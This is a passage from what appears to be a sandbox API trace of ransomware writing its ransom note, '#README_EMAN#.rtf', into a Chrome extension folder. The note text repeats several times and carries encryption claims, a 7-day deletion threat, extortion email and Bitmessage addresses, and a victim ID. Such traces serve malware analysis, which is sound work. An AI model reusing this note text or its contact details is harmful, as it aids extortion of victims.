;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23698d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x16Ùv#Q\x17ß÷\x1c,\x8eg»`Æ;ø\x89÷\x03%|…s¾", lpUsedDefaultChar=0x0) returned 8717 [0271.645] WriteFile (in: hFile=0x2ec, lpBuffer=0x23698d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23698d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.645] CloseHandle (hObject=0x2ec) returned 1 [0271.645] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0271.645] GetLastError () returned 0x2 [0271.645] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 